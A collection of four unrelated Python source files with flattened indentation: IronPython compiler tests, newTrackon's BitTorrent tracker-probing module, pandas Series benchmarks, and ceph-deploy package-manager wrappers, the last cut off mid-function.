Assert(FileExists(pdbfile))
## compile as exe, but main file is INVALID
AssertError(Exception, CompileOneFileAsConsoleApp2, source, assembly)
@disabled("Needs to be updated or removed for DLR")
def test_two_source_consoleapp():
## compile 2 files as exe
source1, source2, assembly, pdbfile = "tempFile2.tpy", "tempFile1.tpy", "tempFile2.exe", "tempFile2.pdb"
write_to_file(source1, '''
import tempFile1
class D(tempFile1.B):
def M2(self):
return 100
b = tempFile1.B()
if (b.M1() != 20) :
raise AssertionError("failed 1")
d= D()
if (d.M2() != 100):
raise AssertionError("failed 2")
''')
FileRemoval(assembly, pdbfile);
CompileTwoFilesAsConsoleApp(source1, source2, assembly, True)
Assert(FileExists(assembly))
Assert(FileExists(pdbfile))
RunPythonExe(assembly)
## compile 2 files as exe, but main file is not set
AssertError(Exception, CompileTwoFilesAsConsoleApp, source1, source2, assembly, False)
@disabled("Needs to be updated or removed for DLR")
def test_debug_consoleapp():
## IncludeDebugInformation
source, assembly, pdbfile = "tempFile1.tpy", "tempFile1.dll", "tempFile1.pdb"
FileRemoval(assembly, pdbfile);
CheckIncludeDebugInformation(source, assembly, True)
Assert(FileExists(assembly))
Assert(FileExists(pdbfile))
FileRemoval(assembly, pdbfile);
CheckIncludeDebugInformation(source, assembly, False)
Assert(FileExists(assembly))
Assert(FileExists(pdbfile) == False)
@disabled("Needs to be updated or removed for DLR")
def test_referenced_assemblies_consoleapp():
## Test Using referenced assemblies
source, assembly, pdbfile = "tempFile3.tpy", "tempFile3.exe", "tempFile3.pdb"
import clr
clr.AddReferenceByPartialName("System.Xml")
# sys.LoadAssembly...("System.xml") is emitted because of referenced assemblies specified
write_to_file(source, '''
import System
import System.Xml
tw = System.Xml.XmlTextWriter("tempResult.xml", System.Text.Encoding.ASCII)
tw.WriteStartDocument()
tw.WriteStartElement("PythonCompiler")
tw.WriteEndElement()
tw.WriteEndDocument()
tw.Close()
''')
fullTypeName = System.Type.GetType("System.Int32").AssemblyQualifiedName.split(',', 2)
UsingReference(source, "System.Xml.XmlTextReader, System.Xml," + fullTypeName[2], assembly)
tempXml = "tempResult.xml"
## BE CLEAN
FileRemoval(tempXml)
## RUN
RunPythonExe(assembly)
## CHECK
Assert(FileExists(tempXml), "File was not generated after running the exe")
f = open(tempXml)
Assert(f.read().find("PythonCompiler") != -1, "The specified word is not found in the file")
f.close()
FileRemoval(tempXml)
for filename in ['tempFile1', 'tempFile2', 'tempFile3']:
for suffix in [ 'tpy', 'dll', 'exe', 'pdb']:
FileRemoval(filename + '.' + suffix)
#
# verify that generated exe will run stand alone.
#
@disabled("Needs to be updated or removed for DLR")
def test_exe_standalone():
tempFile1 = '''
class B:
def M1(self):
return 20
'''
tempFile2 = '''
import tempFile1
class D(tempFile1.B):
def M2(self):
return 100
b = tempFile1.B()
if (b.M1() != 20) :
raise AssertionError("failed 1")
d= D()
if (d.M2() != 100):
raise AssertionError("failed 2")
'''
tempFileName1 = GetFullPath("tempFile1.py")
tempFileName2 = GetFullPath("tempFile2.py")
tempExeName1 = GetFullPath("tempFile1.exe")
tempExeName2 = GetFullPath("tempFile2.exe")
tempPdbName1 = GetFullPath("tempFile1.pdb")
tempPdbName2 = GetFullPath("tempFile2.pdb")
write_to_file(tempFileName1, tempFile1)
write_to_file(tempFileName2, tempFile2)
AreEqual(launch_ironpython_changing_extensions(tempFileName2, ["-X:SaveAssemblies"], ["-X:LightweightScopes", "-X:AssembliesDir"]), 0)
RunPythonExe(tempExeName2)
FileRemoval(tempFileName1, tempFileName2, tempExeName1, tempExeName2, tempPdbName1, tempPdbName2)
#
# Verify that the executable doesn't get generated
#
tempFile1 = """
import System
files = map(lambda extension: System.IO.Path.ChangeExtension(__file__, extension), [".dll", ".exe", ".pdb"])
for file in files:
if System.IO.File.Exists(file):
print file, "exists"
raise AssertionError(file + " exists")
"""
write_to_file(tempFileName1, tempFile1)
AreEqual(launch_ironpython_changing_extensions(tempFileName1, [], ["-X:SaveAssemblies"]), 0)
FileRemoval(tempFileName1, tempExeName1, tempPdbName1)
source1 = "tempFile1.tpy"
source2 = "tempFile2.tpy"
assembly = "tempFile1.exe"
pdbfile = "tempFile1.pdb"
write_to_file(source1, """
import tempFile2
if tempFile2.value != 8.0:
raise AssertionError("failed import built-in")
""")
write_to_file(source2, """
import math
value = math.pow(2, 3)
""")
CompileTwoFilesAsConsoleApp(source1, source2, assembly, True)
Assert(FileExists(assembly))
Assert(FileExists(pdbfile))
RunPythonExe(assembly)
FileRemoval(source1, source2, assembly)
# verify arguments are passed through...
write_to_file(source1, """
import sys
def CustomAssert(c):
if not c: raise AssertionError("Assertin Failed")
CustomAssert(sys.argv[0].lower() == sys.argv[4].lower())
sys.exit(int(sys.argv[1]) + int(sys.argv[2]) + int(sys.argv[3]))
""")
CompileOneFileAsConsoleApp1(source1, assembly, False)
RunPythonExe(assembly, 24, -22, -2, System.IO.Path.Combine(sys.prefix, assembly))
RunPythonExe(".\\" + assembly, 24, -22, -2, System.IO.Path.Combine(sys.prefix, assembly))
FileRemoval(source1, assembly)
@disabled("Needs to be updated or removed for DLR")
def test_compilersinktest():
from IronPythonTest import PythonCompilerSinkTest
st = PythonCompilerSinkTest()
for s in ['''
class Class:zxvc
"Description of Class"cxvxcvb
''',
'(1 and 1) = 1',
'(lambda x: x = 1 )',
' print 1',
'(name1 =1) = 1',
'''d = {}
for x in d.keys()
pass
''',
]:
Assert(st.CompileWithTestSink(s) > 0)
for s in [
'name = 1',
'(name) = 1',
'(name1,name2) = (1,2)',
'name, = (1,0)',
]:
Assert(st.CompileWithTestSink(s) == 0)
@disabled("ResourceFile is not available anymore")
def test_ip_hosting_resource_file():
'''
Test to hit IronPython.Hosting.ResourceFile.
'''
rf_list = [ IronPython.Hosting.ResourceFile("name0", "file0"),
IronPython.Hosting.ResourceFile("name1", "file1", False),
]
rf_list[0].PublicResource = False
for i in range(len(rf_list)):
AreEqual(rf_list[i].Name, "name" + str(i))
rf_list[i].Name = "name"
AreEqual(rf_list[i].Name, "name")
AreEqual(rf_list[i].File, "file" + str(i))
rf_list[i].File = "file"
AreEqual(rf_list[i].File, "file")
AreEqual(rf_list[i].PublicResource, False)
rf_list[i].PublicResource = True
AreEqual(rf_list[i].PublicResource, True)
@skip("multiple_execute")
@skip("netstandard") # no clr.CompileModules in netstandard
def test_compiled_code():
if System.Environment.GetEnvironmentVariable('DLR_SaveAssemblies'):
# The SaveAssemblies option is not compatible with saving code to disk
print('... skipping test if DLR_SaveAssemblies is set...')
return
import clr
pyil = os.path.join(testpath.temporary_dir, 'test.pyil')
# make sure we can compile
clr.CompileModules(pyil, os.path.join(testpath.public_testdir, 'test_class.py'))
# make sure we can compile multiple files
clr.CompileModules(pyil, os.path.join(testpath.public_testdir, 'test_class.py'), os.path.join(testpath.public_testdir, 'test_slice.py'))
clr.AddReferenceToFileAndPath(pyil)
import nt
# and make sure we can run some reasonable sophisticated code...
System.IO.File.Move(os.path.join(testpath.public_testdir, 'test_class.py'), 'old_test_class.py')
try:
import test_class
Assert(test_class.test_oldstyle_getattr.__doc__ != '')
finally:
System.IO.File.Move('old_test_class.py', os.path.join(testpath.public_testdir, 'test_class.py'))
@skip("multiple_execute")
@skip("netstandard") # no System.ICloneable in netstandard
def test_cached_types():
import clr
from System import IComparable, IFormattable, ICloneable
import IronPythonTest
cwd = os.getcwd()
os.chdir(testpath.temporary_dir)
# basic sanity test that we can compile...
clr.CompileSubclassTypes('test', (object, ))
clr.CompileSubclassTypes('test', object)
clr.CompileSubclassTypes('test', object, str, int, float, complex)
clr.CompileSubclassTypes('test', (object, IComparable[()]))
clr.CompileSubclassTypes('test', (object, IComparable[()]), (str, IComparable[()]))
# build an unlikely existing type and make sure construction gives us
# back the correct type.
clr.CompileSubclassTypes('cached_type_dll', (object, IComparable[()], IFormattable, ICloneable))
asm = System.Reflection.Assembly.LoadFrom(os.path.join(testpath.temporary_dir, 'cached_type_dll.dll'))
clr.AddReference(asm)
class x(object, IComparable[()], IFormattable, ICloneable):
pass
a = x()
AreEqual(clr.GetClrType(x).Assembly, asm)
# collect all types that are available in IronPythonTest and
# pre-gen them, then run test_inheritance to make sure it all works.
types = []
queue = [IronPythonTest]
while queue:
cur = queue.pop()
for name in dir(cur):
attr = getattr(cur, name)
if type(attr) is type:
clrType = clr.GetClrType(attr)
if clrType.IsEnum or clrType.IsSealed or clrType.IsValueType or clrType.ContainsGenericParameters:
continue
types.append(attr)
elif type(attr) == type(IronPythonTest):
queue.append(attr)
clr.CompileSubclassTypes('InheritanceTypes', *types)
clr.AddReferenceToFileAndPath(os.path.join(testpath.temporary_dir, 'InheritanceTypes.dll'))
import test_inheritance
#http://ironpython.codeplex.com/WorkItem/View.aspx?WorkItemId=21892
# verify that GetSubclassedTypes round trips with clr.CompileSubclassTypes
clr.CompileSubclassTypes('finaltest', *clr.GetSubclassedTypes())
clr.AddReference('finaltest')
os.chdir(cwd)
run_test(__name__)
os.remove('tempFile1.tpy')
|
|
import pprint
import random
import socket
import string
import struct
import subprocess
from logging import getLogger
from os import urandom
from time import time
from urllib.parse import urlparse, urlencode
from dns import resolver
from dns.exception import DNSException
import requests
from newTrackon.bdecode import bdecode, decode_binary_peers_list
from newTrackon.persistence import submitted_data
from newTrackon.utils import process_txt_prefs, build_httpx_url
HTTP_PORT = 6881
UDP_PORT = 30461
my_ipv4 = None
my_ipv6 = None
SCRAPING_HEADERS = {
"User-Agent": "qBittorrent/4.3.9",
"Accept-Encoding": "gzip",
"Connection": "close",
}
logger = getLogger("newtrackon_logger")
to_redact = [str(HTTP_PORT), str(UDP_PORT)]
def attempt_submitted(tracker):
submitted_url = urlparse(tracker.url)
try:
failover_ip = socket.getaddrinfo(submitted_url.hostname, None)[0][4][0]
except OSError:
failover_ip = ""
valid_bep_34, bep_34_info = get_bep_34(submitted_url.hostname)
if valid_bep_34: # Hostname has a valid TXT record as per BEP34
if not bep_34_info:
logger.info(
f"Hostname denies connection via BEP34, giving up on submitted tracker {tracker.url}"
)
submitted_data.appendleft(
{
"url": tracker.url,
"time": int(time()),
"status": 0,
"ip": failover_ip,
"info": ["Tracker denied connection according to BEP34"],
}
)
raise RuntimeError
elif bep_34_info:
logger.info(
f"Tracker {tracker.url} sets protocol and port preferences from BEP34: {str(bep_34_info)}"
)
return attempt_from_txt_prefs(submitted_url, failover_ip, bep_34_info)
else: # No valid BEP34, attempting all protocols
return attempt_all_protocols(submitted_url, failover_ip)
def attempt_from_txt_prefs(submitted_url, failover_ip, txt_prefs):
for preference in txt_prefs:
preferred_url = submitted_url._replace(
netloc="{}:{}".format(submitted_url.hostname, preference[1])
)
if preference[0] == "udp":
udp_success, udp_interval, udp_url, latency = attempt_udp(
failover_ip, preferred_url.netloc
)
if udp_success:
return udp_interval, udp_url, latency
elif preference[0] == "tcp":
http_success, http_interval, http_url, latency = attempt_https_http(
failover_ip, preferred_url
)
if http_success:
return http_interval, http_url, latency
logger.info(
f"All DNS TXT protocol preferences failed, giving up on submitted tracker {submitted_url.geturl()}"
)
raise RuntimeError
def attempt_all_protocols(submitted_url, failover_ip):
# UDP scrape
if submitted_url.port: # If the tracker netloc has a port, try with UDP
udp_success, udp_interval, udp_url, latency = attempt_udp(
failover_ip, submitted_url.netloc
)
if udp_success:
return udp_interval, udp_url, latency
logger.info(f"{udp_url} UDP failed")
# HTTPS and HTTP scrape
http_success, http_interval, http_url, latency = attempt_https_http(
failover_ip, submitted_url
)
if http_success:
return http_interval, http_url, latency
logger.info(
f"All protocols failed, giving up on submitted tracker {submitted_url.geturl()}"
)
raise RuntimeError
def attempt_https_http(failover_ip, url):
# HTTPS scrape
https_success, https_interval, https_url, latency = attempt_httpx(
failover_ip, url, tls=True
)
if https_success:
return https_success, https_interval, https_url, latency
logger.info(f"{https_url} HTTPS failed")
# HTTP scrape
http_success, http_interval, http_url, latency = attempt_httpx(
failover_ip, url, tls=False
)
if http_success:
return http_success, http_interval, http_url, latency
logger.info(f"{http_url} HTTP failed")
return None, None, None, None
def attempt_httpx(failover_ip, submitted_url, tls=True):
http_url = build_httpx_url(submitted_url, tls)
pp = pprint.PrettyPrinter(width=999999, compact=True)
t1 = time()
debug_http = {"url": http_url, "time": int(t1), "ip": failover_ip}
latency = 0
http_response = {}
try:
http_response = announce_http(http_url)
latency = int((time() - t1) * 1000)
pretty_data = redact_origin(pp.pformat(http_response))
debug_http.update({"info": [pretty_data], "status": 1})
except RuntimeError as e:
debug_http.update({"info": [redact_origin(str(e))], "status": 0})
submitted_data.appendleft(debug_http)
return debug_http["status"], http_response.get("interval"), http_url, latency
def attempt_udp(failover_ip, tracker_netloc):
pp = pprint.PrettyPrinter(width=999999, compact=True)
udp_url = "udp://" + tracker_netloc + "/announce"
t1 = time()
udp_attempt_result = {"url": udp_url, "time": int(t1)}
latency = 0
parsed_response = {}
try:
parsed_response, ip = announce_udp(udp_url)
latency = int((time() - t1) * 1000)
pretty_data = redact_origin(pp.pformat(parsed_response))
udp_attempt_result.update({"info": [pretty_data], "status": 1, "ip": ip})
except RuntimeError as e:
udp_attempt_result.update({"info": [str(e)], "status": 0})
if udp_attempt_result["info"] != ["Can't resolve IP"]:
udp_attempt_result["ip"] = failover_ip
submitted_data.appendleft(udp_attempt_result)
return (
udp_attempt_result["status"],
parsed_response.get("interval"),
udp_url,
latency,
)
def get_bep_34(hostname):
"""Querying for http://bittorrent.org/beps/bep_0034.html"""
try:
answers = resolver.resolve(hostname, "TXT")
for record in answers:
record_text = str(record)[1:-1]
if record_text.startswith("BITTORRENT"):
return True, process_txt_prefs(record_text)
except DNSException:
pass
return False, None
def announce_http(url, thash=urandom(20)):
logger.info(f"{url} Scraping HTTP(S)")
pid = "-qB4390-" + "".join(
[random.choice(string.ascii_letters + string.digits) for _ in range(12)]
)
args_dict = {
"info_hash": thash,
"peer_id": pid,
"port": HTTP_PORT,
"uploaded": 0,
"downloaded": 0,
"left": 0,
"compact": 1,
"ipv6": my_ipv6,
"ipv4": my_ipv4,
}
arguments = urlencode(args_dict)
url = url + "?" + arguments
try:
response = requests.get(url, headers=SCRAPING_HEADERS, timeout=10)
except requests.Timeout:
raise RuntimeError("HTTP timeout")
except requests.HTTPError:
raise RuntimeError("HTTP error")
except requests.ConnectionError:
raise RuntimeError("HTTP connection failed")
except requests.RequestException:
raise RuntimeError("Ambiguous HTTP error")
if response.status_code != 200:
raise RuntimeError("HTTP %s status code returned" % response.status_code)
elif not response.content:
raise RuntimeError("Got empty HTTP response")
else:
try:
tracker_response = bdecode(response.content)
except:
raise RuntimeError("Can't bdecode the response")
if "failure reason" in tracker_response:
raise RuntimeError(
'Tracker error message: "%s"' % (tracker_response["failure reason"])
)
if "peers" not in tracker_response and "peers6" not in tracker_response:
raise RuntimeError(
"Invalid response, both 'peers' and 'peers6' field are missing: "
+ str(tracker_response)
)
logger.info(f"{url} response: {tracker_response}")
return tracker_response
def announce_udp(udp_url, thash=urandom(20)):
parsed_tracker = urlparse(udp_url)
logger.info(f"{udp_url} Scraping UDP")
sock = None
ip = None
getaddr_responses = []
try:
for res in socket.getaddrinfo(
parsed_tracker.hostname, parsed_tracker.port, 0, socket.SOCK_DGRAM
):
getaddr_responses.append(res)
except OSError as err:
raise RuntimeError("UDP error: " + str(err))
for res in getaddr_responses:
af, socktype, proto, _, sa = res
ip = sa[0]
try:
sock = socket.socket(af, socktype, proto)
sock.settimeout(10)
except OSError:
sock = None
continue
try:
sock.connect(sa)
except OSError:
sock.close()
sock = None
continue
break
if sock is None:
raise RuntimeError("UDP connection error")
# Get connection ID
req, transaction_id = udp_create_binary_connection_request()
try:
sock.sendall(req)
buf = sock.recv(2048)
except ConnectionRefusedError:
raise RuntimeError("UDP connection failed")
except socket.timeout:
raise RuntimeError("UDP timeout")
except OSError as err:
raise RuntimeError("UDP error: " + str(err))
connection_id = udp_parse_connection_response(buf, transaction_id)
# Scrape away
req, transaction_id = udp_create_announce_request(connection_id, thash)
try:
sock.sendall(req)
buf = sock.recv(2048)
except ConnectionRefusedError:
raise RuntimeError("UDP connection failed")
except socket.timeout:
raise RuntimeError("UDP timeout")
except OSError as err:
raise RuntimeError("UDP error: " + str(err))
ip_family = sock.family
sock.close()
parsed_response, raw_response = udp_parse_announce_response(
buf, transaction_id, ip_family
)
logger.info(f"{udp_url} response: {parsed_response}")
return parsed_response, ip
def udp_create_binary_connection_request():
connection_id = 0x41727101980 # default connection id
action = 0x0 # action (0 = give me a new connection id)
transaction_id = udp_get_transaction_id()
buf = struct.pack("!q", connection_id) # first 8 bytes is connection id
buf += struct.pack("!i", action) # next 4 bytes is action
buf += struct.pack("!i", transaction_id) # next 4 bytes is transaction id
return buf, transaction_id
def udp_parse_connection_response(buf, sent_transaction_id):
if len(buf) < 16:
raise RuntimeError("Wrong response length getting connection id: %s" % len(buf))
action = struct.unpack_from("!i", buf)[0] # first 4 bytes is action
res_transaction_id = struct.unpack_from("!i", buf, 4)[
0
] # next 4 bytes is transaction id
if res_transaction_id != sent_transaction_id:
raise RuntimeError(
"Transaction ID doesn't match in connection response. Expected %s, got %s"
% (sent_transaction_id, res_transaction_id)
)
if action == 0x0:
connection_id = struct.unpack_from("!q", buf, 8)[
0
] # unpack 8 bytes from byte 8, should be the connection_id
return connection_id
elif action == 0x3:
error = struct.unpack_from("!s", buf, 8)
raise RuntimeError(
"Error while trying to get a connection response: %s" % error
)
def udp_create_announce_request(connection_id, thash):
action = 0x1 # action (1 = announce)
transaction_id = udp_get_transaction_id()
buf = struct.pack("!q", connection_id) # first 8 bytes is connection id
buf += struct.pack("!i", action) # next 4 bytes is action
buf += struct.pack("!i", transaction_id) # followed by 4 byte transaction id
buf += struct.pack("!20s", thash) # hash
buf += struct.pack("!20s", thash) # peer id, should be random
buf += struct.pack("!q", 0x0) # number of bytes downloaded
buf += struct.pack("!q", 0x0) # number of bytes left
buf += struct.pack("!q", 0x0) # number of bytes uploaded
buf += struct.pack("!i", 0x2) # event 0 denotes start of downloading
buf += struct.pack(
"!i", 0x0
) # IP address set to 0. Response received to the sender of this packet
key = udp_get_transaction_id() # Unique key randomized by client
buf += struct.pack("!i", key)
buf += struct.pack("!i", -1) # Number of peers required. Set to -1 for default
buf += struct.pack("!H", 0x76FD) # port on which response will be sent
return buf, transaction_id
def udp_parse_announce_response(buf, sent_transaction_id, ip_family):
if len(buf) < 20:
raise RuntimeError("Wrong response length while announcing: %s" % len(buf))
action = struct.unpack_from("!i", buf)[0] # first 4 bytes is action
res_transaction_id = struct.unpack_from("!i", buf, 4)[
0
] # next 4 bytes is transaction id
if res_transaction_id != sent_transaction_id:
raise RuntimeError(
"Transaction ID doesnt match in announce response! Expected %s, got %s"
% (sent_transaction_id, res_transaction_id)
)
if action == 0x1:
ret = dict()
offset = 8 # next 4 bytes after action is transaction_id, so data doesnt start till byte 8
ret["interval"] = struct.unpack_from("!i", buf, offset)[0]
offset += 4
ret["leechers"] = struct.unpack_from("!i", buf, offset)[0]
offset += 4
ret["seeds"] = struct.unpack_from("!i", buf, offset)[0]
offset += 4
ret["peers"] = decode_binary_peers_list(buf, offset, ip_family)
return ret, buf.hex()
else:
# an error occured, try and extract the error string
error = struct.unpack_from("!s", buf, 8)
raise RuntimeError("Error while annoucing: %s" % error)
def udp_get_transaction_id():
return int(random.randrange(0, 255))
def get_server_ip(ip_version):
return (
subprocess.check_output(
["curl", "-s", "-" + ip_version, "https://icanhazip.com/"]
)
.decode("utf-8")
.strip()
)
def redact_origin(response):
if my_ipv4:
response = response.replace(my_ipv4, "v4-redacted")
if my_ipv6:
response = response.replace(my_ipv6, "v6-redacted")
for port in to_redact:
response = response.replace(port, "redacted")
return response
|
|
from datetime import datetime
import numpy as np
import pandas.util.testing as tm
from pandas import Series, date_range, NaT
class SeriesConstructor(object):
params = [None, 'dict']
param_names = ['data']
def setup(self, data):
self.idx = date_range(start=datetime(2015, 10, 26),
end=datetime(2016, 1, 1),
freq='50s')
dict_data = dict(zip(self.idx, range(len(self.idx))))
self.data = None if data is None else dict_data
def time_constructor(self, data):
Series(data=self.data, index=self.idx)
class IsIn(object):
params = ['int64', 'uint64', 'object']
param_names = ['dtype']
def setup(self, dtype):
self.s = Series(np.random.randint(1, 10, 100000)).astype(dtype)
self.values = [1, 2]
def time_isin(self, dtypes):
self.s.isin(self.values)
class IsInFloat64(object):
def setup(self):
self.small = Series([1, 2], dtype=np.float64)
self.many_different_values = np.arange(10**6, dtype=np.float64)
self.few_different_values = np.zeros(10**7, dtype=np.float64)
self.only_nans_values = np.full(10**7, np.nan, dtype=np.float64)
def time_isin_many_different(self):
# runtime is dominated by creation of the lookup-table
self.small.isin(self.many_different_values)
def time_isin_few_different(self):
# runtime is dominated by creation of the lookup-table
self.small.isin(self.few_different_values)
def time_isin_nan_values(self):
# runtime is dominated by creation of the lookup-table
self.small.isin(self.few_different_values)
class IsInForObjects(object):
def setup(self):
self.s_nans = Series(np.full(10**4, np.nan)).astype(np.object)
self.vals_nans = np.full(10**4, np.nan).astype(np.object)
self.s_short = Series(np.arange(2)).astype(np.object)
self.s_long = Series(np.arange(10**5)).astype(np.object)
self.vals_short = np.arange(2).astype(np.object)
self.vals_long = np.arange(10**5).astype(np.object)
# because of nans floats are special:
self.s_long_floats = Series(np.arange(10**5,
dtype=np.float)).astype(np.object)
self.vals_long_floats = np.arange(10**5,
dtype=np.float).astype(np.object)
def time_isin_nans(self):
# if nan-objects are different objects,
# this has the potential to trigger O(n^2) running time
self.s_nans.isin(self.vals_nans)
def time_isin_short_series_long_values(self):
# running time dominated by the preprocessing
self.s_short.isin(self.vals_long)
def time_isin_long_series_short_values(self):
# running time dominated by look-up
self.s_long.isin(self.vals_short)
def time_isin_long_series_long_values(self):
# no dominating part
self.s_long.isin(self.vals_long)
def time_isin_long_series_long_values_floats(self):
# no dominating part
self.s_long_floats.isin(self.vals_long_floats)
class NSort(object):
params = ['first', 'last', 'all']
param_names = ['keep']
def setup(self, keep):
self.s = Series(np.random.randint(1, 10, 100000))
def time_nlargest(self, keep):
self.s.nlargest(3, keep=keep)
def time_nsmallest(self, keep):
self.s.nsmallest(3, keep=keep)
class Dropna(object):
params = ['int', 'datetime']
param_names = ['dtype']
def setup(self, dtype):
N = 10**6
data = {'int': np.random.randint(1, 10, N),
'datetime': date_range('2000-01-01', freq='S', periods=N)}
self.s = Series(data[dtype])
if dtype == 'datetime':
self.s[np.random.randint(1, N, 100)] = NaT
def time_dropna(self, dtype):
self.s.dropna()
class SearchSorted(object):
goal_time = 0.2
params = ['int8', 'int16', 'int32', 'int64',
'uint8', 'uint16', 'uint32', 'uint64',
'float16', 'float32', 'float64',
'str']
param_names = ['dtype']
def setup(self, dtype):
N = 10**5
data = np.array([1] * N + [2] * N + [3] * N).astype(dtype)
self.s = Series(data)
def time_searchsorted(self, dtype):
key = '2' if dtype == 'str' else 2
self.s.searchsorted(key)
class Map(object):
params = ['dict', 'Series']
param_names = 'mapper'
def setup(self, mapper):
map_size = 1000
map_data = Series(map_size - np.arange(map_size))
self.map_data = map_data if mapper == 'Series' else map_data.to_dict()
self.s = Series(np.random.randint(0, map_size, 10000))
def time_map(self, mapper):
self.s.map(self.map_data)
class Clip(object):
params = [50, 1000, 10**5]
param_names = ['n']
def setup(self, n):
self.s = Series(np.random.randn(n))
def time_clip(self, n):
self.s.clip(0, 1)
class ValueCounts(object):
params = ['int', 'uint', 'float', 'object']
param_names = ['dtype']
def setup(self, dtype):
self.s = Series(np.random.randint(0, 1000, size=100000)).astype(dtype)
def time_value_counts(self, dtype):
self.s.value_counts()
class Dir(object):
def setup(self):
self.s = Series(index=tm.makeStringIndex(10000))
def time_dir_strings(self):
dir(self.s)
class SeriesGetattr(object):
# https://github.com/pandas-dev/pandas/issues/19764
def setup(self):
self.s = Series(1,
index=date_range("2012-01-01", freq='s',
periods=int(1e6)))
def time_series_datetimeindex_repr(self):
getattr(self.s, 'a', None)
from .pandas_vb_common import setup # noqa: F401
|
|
import os
from urlparse import urlparse
from ceph_deploy.lib import remoto
from ceph_deploy.util import templates
def apt(conn, packages, *a, **kw):
if isinstance(packages, str):
packages = [packages]
cmd = [
'env',
'DEBIAN_FRONTEND=noninteractive',
'apt-get',
'install',
'--assume-yes',
]
cmd.extend(packages)
return remoto.process.run(
conn,
cmd,
*a,
**kw
)
def apt_remove(conn, packages, *a, **kw):
if isinstance(packages, str):
packages = [packages]
purge = kw.pop('purge', False)
cmd = [
'apt-get',
'-q',
'remove',
'-f',
'-y',
'--force-yes',
]
if purge:
cmd.append('--purge')
cmd.extend(packages)
return remoto.process.run(
conn,
cmd,
*a,
**kw
)
def apt_update(conn):
cmd = [
'apt-get',
'-q',
'update',
]
return remoto.process.run(
conn,
cmd,
)
def yum(conn, packages, *a, **kw):
if isinstance(packages, str):
packages = [packages]
cmd = [
'yum',
'-y',
'install',
]
cmd.extend(packages)
return remoto.process.run(
conn,
cmd,
*a,
**kw
)
def yum_remove(conn, packages, *a, **kw):
cmd = [
'yum',
'-y',
'-q',
'remove',
]
if isinstance(packages, str):
cmd.append(packages)
else:
cmd.extend(packages)
return remoto.process.run(
conn,
cmd,
*a,
**kw
)
def yum_clean(conn, item=None):
item = item or 'all'
cmd = [
'yum',
'clean',
item,
]
return remoto.process.run(
conn,
cmd,
)
def rpm(conn, rpm_args=None, *a, **kw):
"""
A minimal front end for ``rpm`. Extra flags can be passed in via
``rpm_args`` as an iterable.
"""
rpm_args = rpm_args or []
cmd = [
'rpm',
'-Uvh',
]
cmd.extend(rpm_args)
return remoto.process.run(
conn,
cmd,
*a,
**kw
)
def zypper(conn, packages, *a, **kw):
if isinstance(packages, str):
packages = [packages]
cmd = [
'zypper',
'--non-interactive',
'install',
]
cmd.extend(packages)
return remoto.process.run(
conn,
cmd,
*a,
**kw
)
def zypper_remove(conn, packages, *a, **kw):
cmd = [
'zypper',
'--non-interactive',
'--quiet',
'remove',
]
if isinstance(packages, str):
cmd.append(packages)
else:
cmd.extend(packages)
return remoto.process.run(
conn,
cmd,
*a,
**kw
)
def zypper_refresh(conn):
cmd = [
'zypper',
'--non-interactive',
'refresh',
]
return remoto.process.run(
conn,
cmd
)
class PackageManager(object):
"""
Base class for all Package Managers
"""
def __init__(self, remote_conn):
self.remote_info = remote_conn
self.remote_conn = remote_conn.conn
def _run(self, cmd, **kw):
return remoto.process.run(
self.remote_conn,
cmd,
**kw
)
def install(self, packages, **kw):
"""Install packages on remote node"""
raise NotImplementedError()
def remove(self, packages, **kw):
"""Uninstall packages on remote node"""
raise NotImplementedError()
def clean(self):
"""Clean metadata/cache"""
raise NotImplementedError()
def add_repo_gpg_key(self, url):
"""Add given GPG key for repo verification"""
raise NotImplementedError()
def add_repo(self, name, url, **kw):
"""Add/rewrite a repo file"""
raise NotImplementedError()
def remove_repo(self, name):
"""Remove a repo definition"""
raise NotImplementedError()
class RPMManagerBase(PackageManager):
"""
Base class to hold common pieces of Yum and DNF
"""
executable = None
name = None
def install(self, packages, **kw):
if isinstance(packages, str):
packages = [packages]
extra_flags = kw.pop('extra_install_flags', None)
cmd = [
self.executable,
'-y',
'install',
]
if extra_flags:
if isinstance(extra_flags, str):
extra_flags = [extra_flags]
cmd.extend(extra_flags)
cmd.extend(packages)
return self._run(cmd)
def remove(self, packages, **kw):
if isinstance(packages, str):
packages = [packages]
extra_flags = kw.pop('extra_remove_flags', None)
cmd = [
self.executable,
'-y',
'-q',
'remove',
]
if extra_flags:
if isinstance(extra_flags, str):
extra_flags = [extra_flags]
cmd.extend(extra_flags)
cmd.extend(packages)
return self._run(cmd)
def clean(self, item=None):
item = item or 'all'
cmd = [
self.executable,
'clean',
item,
]
return self._run(cmd)
def add_repo_gpg_key(self, url):
cmd = ['rpmkeys', '--import', url]
self._run(cmd)
def add_repo(self, name, url, **kw):
gpg_url = kw.pop('gpg_url', None)
if gpg_url:
self.add_repo_gpg_key(gpg_url)
gpgcheck=1
else:
gpgcheck=0
# RPM repo defaults
description = kw.pop('description', '%s repo' % name)
enabled = kw.pop('enabled', 1)
proxy = kw.pop('proxy', '') # will get ignored if empty
_type = 'repo-md'
baseurl = url.strip('/') # Remove trailing slashes
ceph_repo_content = templates.custom_repo(
reponame=name,
name=description,
baseurl=baseurl,
enabled=enabled,
gpgcheck=gpgcheck,
_type=_type,
gpgkey=gpg_url,
proxy=proxy,
**kw
)
self.remote_conn.remote_module.write_yum_repo(
ceph_repo_content,
'%s.repo' % name
)
def remove_repo(self, name):
filename = os.path.join(
'/etc/yum.repos.d',
'%s.repo' % name
)
self.remote_conn.remote_module.unlink(filename)
class DNF(RPMManagerBase):
"""
The DNF Package manager
"""
executable = 'dnf'
name = 'dnf'
def install(self, packages, **kw):
extra_install_flags = kw.pop('extra_install_flags', [])
if '--best' not in extra_install_flags:
extra_install_flags.append('--best')
super(DNF, self).install(
packages,
extra_install_flags=extra_install_flags,
**kw
)
class Yum(RPMManagerBase):
"""
The Yum Package manager
"""
executable = 'yum'
name = 'yum'
class Apt(PackageManager):
"""
Apt package management
"""
executable = [
'env',
'DEBIAN_FRONTEND=noninteractive',
'DEBIAN_PRIORITY=critical',
'apt-get',
'--assume-yes',
'-q',
]
name = 'apt'
def install(self, packages, **kw):
if isinstance(packages, str):
packages = [packages]
extra_flags = kw.pop('extra_install_flags', None)
cmd = self.executable + [
'--no-install-recommends',
'install'
]
if extra_flags:
if isinstance(extra_flags, str):
extra_flags = [extra_flags]
cmd.extend(extra_flags)
cmd.extend(packages)
return self._run(cmd)
def remove(self, packages, **kw):
if isinstance(packages, str):
packages = [packages]
extra_flags = kw.pop('extra_remove_flags', None)
cmd = self.executable + [
'-f',
'--force-yes',
'remove'
]
if extra_flags:
if isinstance(extra_flags, str):
extra_flags = [extra_flags]
